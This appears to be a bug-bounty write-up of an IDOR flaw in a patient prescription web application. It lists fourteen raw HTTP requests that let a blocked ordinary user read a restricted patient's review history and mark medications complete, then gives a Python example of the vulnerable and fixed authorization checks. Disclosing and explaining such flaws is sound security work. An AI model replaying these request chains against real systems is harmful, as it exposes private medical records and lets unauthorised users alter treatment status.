Hello folks, it's me again, m7arm4n :) I want to tell the story of a strange IDOR today. So let's get into it…
This website has 2 types of users:
User A → Admin, who can set privacy for other users and can see the patients etc.
User B → Normal user, who is unable to set privacy for other users
- To set up the attack scenario, the admin user (User A) must create a patient account from the patient tab → Add Patient button.
- Go to Settings → Manage Privacy And Restriction → block the User B account and submit.
- Then, from the admin account, go to the patient tab, select the patient, click the Review History button, then click "Add a prescription reported by patient", search, and add one at random.
Basically, what we are doing here is capturing the requests that change a patient record. Once we have the structure of those requests, we no longer need the admin account: we replay them from the attacker's account, because a regular user account can perform the attack.
Steps to reproduce (Attacker Account)
Let's get back to the User B account. Here we have to change 4 values in the following requests to perform the attack: Cookie, patientID, userID and RxID.
To find the values and parameters needed, go to the patient tab and click on it to trigger the request, capture it, and look at the request to /API/PrivacyOverrideApi/CheckIsRestrictedUser/: it contains what we are looking for.
Now we paste the following requests in order and send them:
Request 1:
POST /api/PrivacyOverrideApi/CheckIsRestrictedUser HTTP/2
Host: domain.tld
Cookie: Cookie
Content-Type: application/json
{"patientId":"patientId","userId":"userId"}
Request 2:
POST /api/selectpatientapi/setpatientinfo HTTP/2
Host: domain.tld
Cookie: Cookie
Content-Type: application/json
Content-Length: 38
"patientId"
Request 3:
POST /api/PatientMedRecApi/GetMedReconciliationInfo HTTP/2
Host: domain.tld
Cookie: Cookie
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:120.0) Gecko/20100101 Firefox/120.0
Content-Length: 0
Request 4:
POST /api/contentload/retrieverefreshpayload HTTP/2
Host: domain.tld
Cookie: Cookie
Content-Type: application/json
Content-Length: 15
"ReviewHistory"
Request 5:
GET /LogRxDisplay.aspx?page=reviewhistory& HTTP/2
Host: domain.tld
Cookie: Cookie
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:120.0) Gecko/20100101 Firefox/120.0
Request 6:
POST /api/PatientHeaderAPI/GetPatientHeaderData HTTP/2
Host: domain.tld
Cookie: Cookie
Content-Type: application/json
Content-Length: 38
"patientId"
Request 7:
POST /api/ReviewHistoryApi/AuditAccessAndGetStartupParameters HTTP/2
Host: domain.tld
Cookie: Cookie
Content-Length: 0
Request 8 (in the response to this request you can find the RxID value; copy it):
POST /api/ReviewHistoryApi/GetPatientReviewHistory HTTP/2
Host: domain.tld
Cookie: Cookie
Content-Type: application/json
Content-Length: 115
{"statusFilter":0,"dataRetrievalContext":{"SortColumnName":"RxDate","SortDirection":1,"SkipRows":0,"FetchRows":50}}
Request 9:
POST /api/PatientMedRecApi/GetMedReconciliationInfo HTTP/2
Host: domain.tld
Cookie: Cookie
Content-Length: 0
Request 10:
POST /api/RxDetailApi/GetRxDetail HTTP/2
Host: domain.tld
Cookie: Cookie
Content-Type: application/json
Content-Length: 38
"RxID_value"
Request 11:
POST /api/ReviewHistoryApi/ExecuteCompleteActionMethod HTTP/2
Host: domain.tld
Cookie: Cookie
Content-Type: application/json
Content-Length: 40
["RxID_value"]
Request 12 (this request only returns the specific patient's info, but there is no ID in it!):
POST /api/ReviewHistoryApi/GetPatientReviewHistory HTTP/2
Host: domain.tld
Cookie: Cookie
Content-Type: application/json
Content-Length: 115
{"statusFilter":0,"dataRetrievalContext":{"SortColumnName":"RxDate","SortDirection":1,"SkipRows":0,"FetchRows":50}}
Request 13 (this request only returns the specific patient's info, but there is no ID in it!):
POST /api/PatientHeaderAPI/GetPatientActiveMeds HTTP/2
Host: domain.tld
Cookie: Cookie
Content-Type: application/json
Content-Length: 0
Request 14 (this request only returns the specific patient's info, but there is no ID in it!):
POST /api/PatientMedRecApi/GetMedReconciliationInfo HTTP/2
Host: domain.tld
Cookie: Cookie
Content-Type: application/json
Content-Length: 0
What happened and what is the impact?
First, nothing in this attack actually requires the admin account: all we need is to capture the request structure from the admin account once, keep it, and then replace its data with the attacker's data. Also, in this scenario the admin has blocked the attacker's account from accessing the patient, yet the attacker is still able to read the patient's history, and if the admin prescribes medicine for the patient, the attacker can mark the medication process as done without any permission.
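To make the root cause concrete, here is an added example (not the post's code and not the vendor's application) that models the stateful "select patient, then fetch" flow from the requests above in Python: the vulnerable server stores the selected patient in the session without checking the admin's restriction and every later endpoint trusts that session, while the hardened version re-checks the restriction on selection and on every access. The restriction table, patient data and user IDs are constructed sample values.

```python
# Constructed sample data: the admin has blocked user "userB" from patient "p1".
RESTRICTIONS = {("p1", "userB")}                             # (patientId, userId) blocked pairs
HISTORY = {"p1": [{"rxId": "rx-100", "status": "pending"}]}  # constructed review history

def is_restricted(patient_id, user_id):
    # The answer CheckIsRestrictedUser returns; advisory unless the server also enforces it.
    return (patient_id, user_id) in RESTRICTIONS

class Session:
    # Server-side session: the later endpoints carry no ID, they read the patient from here.
    def __init__(self, user_id):
        self.user_id, self.patient_id = user_id, None

# Vulnerable pattern: setpatientinfo stores the choice unchecked and every later endpoint
# trusts the session, so skipping the client's CheckIsRestrictedUser call bypasses the block.
def set_patient_info_vuln(session, patient_id):
    session.patient_id = patient_id
    return 200

def get_review_history_vuln(session):
    return HISTORY.get(session.patient_id, [])

# Hardened pattern: the restriction is enforced server-side on selection and on every access.
def require_patient_access(session):
    if session.patient_id is None or is_restricted(session.patient_id, session.user_id):
        raise PermissionError("user is restricted from this patient")

def set_patient_info_fixed(session, patient_id):
    if is_restricted(patient_id, session.user_id):
        return 403
    session.patient_id = patient_id
    return 200

def get_review_history_fixed(session):
    require_patient_access(session)
    return HISTORY[session.patient_id]

def complete_rx_fixed(session, rx_ids):
    # ExecuteCompleteActionMethod equivalent: marking an Rx done needs the same check.
    require_patient_access(session)
    for rx in HISTORY[session.patient_id]:
        if rx["rxId"] in rx_ids:
            rx["status"] = "complete"
    return 200

def demo():
    # (records leaked to the blocked user by the vulnerable flow, status code from the fixed flow)
    s = Session("userB")
    set_patient_info_vuln(s, "p1")
    return len(get_review_history_vuln(s)), set_patient_info_fixed(Session("userB"), "p1")
```

The point of `require_patient_access` is that the check runs inside every endpoint that reads or mutates the selected patient, so a client that simply never calls CheckIsRestrictedUser gains nothing.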